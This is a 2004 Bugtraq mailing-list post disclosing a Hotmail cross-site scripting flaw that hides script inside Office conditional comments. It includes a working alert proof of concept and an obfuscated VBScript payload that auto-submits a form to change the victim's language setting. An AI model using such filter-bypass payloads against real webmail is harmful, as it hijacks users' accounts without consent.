Hotmail Cross Site Scripting Vulnerability

To: bugtraq@xxxxxxxxxxxxxxxxx
Subject: Hotmail Cross Site Scripting Vulnerability
From: Paul <paul@xxxxxxxxxxxxxxxx>
Date: 15 Jul 2004 23:16:07 -0000
List-help: <mailto:bugtraq-help@securityfocus.com>
List-id: <bugtraq.list-id.securityfocus.com>
List-post: <mailto:bugtraq@securityfocus.com>
List-subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
List-unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
Mailing-list: contact bugtraq-help@xxxxxxxxxxxxxxxxx; run by ezmlm


Note: This vulnerability as well as several more can be found at 
http://greyhats.cjb.net

Hotmail Cross Site Scripting Vulnerability 

[Tested]
IEXPLORE.EXE file version 6.0.2800.1106
MSHTML.DLL file version 6.00.2800.1400
Hotmail Version [who knows] 

[Discussion]
I think it's been a while since we gave hotmail a little challenge don't you? 
Well here it is :). A brand spankin' new XSS vulnerability is available for use 
in hotmail and probably hotmail only.

Try this: Create a document in MS Word and put in a couple things like pictures 
and whatnot. Then save it as a webpage. Through all that clutter you'll see 
something like this: 
<!--[if gte mso 9]> some stuff <![endif]-->

That's like some cool little checker for certain features in the user's browser.

What does that do for us? Well, Hotmail was just nice enough to be a little 
lenient on what goes in-between those 'if' tags. I suppose that's so MS Word 
can send stuff through email to Hotmail customers without it getting messed up.

Unfortunatly, they forgot one thing: Script! Let's put together some nice 
little 'if' tag. The 'if' tag above checks if ms office '9' is installed. 
Something cool about these 'if' tags is that you can use an exclamation mark 
('!') to check is something is not something else. So I'll use <!--[if !gte mso 
1337]>. I'm pretty sure they don't have an MS Office 1337 out yet ;). So let's 
start checking stuff. Apparently,

<!--[if !gte mso 1337]>&lt;script&gt;alert('XXS 
haha!');&lt;/script&gt;<![endif]-->

doesnt work. But lets try this:

<!--[if !gte mso 1337]><img src="javascript:alert('XSS haha!')"><![endif]-->

Well whatta ya know. It works :).

As far as I know, you can use anything in-between the 'if' tags that you want 
except &lt;script&gt;. The example script below changes the victim's hotmail 
language to chinese upon viewing of the message from a browser. 


<html><body><!--[if !gte mso 1337]>
<IMG src='vbscript:document.write("<html>" & vbcrlf & "<head>" & vbcrlf & 
"<form name=""language"" method=""POST"" action=""/cgi-bin/dolang"">" & vbcrlf 
& "<input type=""hidden"" name=""curmbox"" value=""F000000001"">" & vbcrlf & 
"<input type=""hidden"" name=""HrsTest"" value="""">" & vbcrlf & "<input 
type=""hidden"" name=""id"" value=""2"">" & vbcrlf & "<input type=""hidden"" 
name=""cb"" value=""_lang=EN&amp;country=US"">" & vbcrlf & "<input 
type=""hidden"" name=""ref"" value="""">" & vbcrlf & "<input type=""hidden"" 
name=""Language"" value=""CN"" >" & vbcrlf & "<input type=""hidden"" 
name=""OK.x"" value="" OK "">" & vbcrlf & "I hope you can read chinese :)" & 
vbcrlf & "</form>" & vbcrlf & "<s"&"cript language=""vbs"&"cript"">" & vbcrlf & 
"document.language.submit()" & vbcrlf & "</sc"&"ript>")'>
<![endif]-->

Follow-Ups:
- Re: Hotmail Cross Site Scripting Vulnerability
  - From: GreyMagic Security

Prev by Date: RE: MSIE Download Window Filename + Filetype Spoofing Vulnerability
Next by Date: [CLA-2004:847] Conectiva Security Announcement - php4
Previous by thread: [OpenPKG-SA-2004.032] OpenPKG Security Advisory (apache)
Next by thread: Re: Hotmail Cross Site Scripting Vulnerability
Index(es):
- Date
- Thread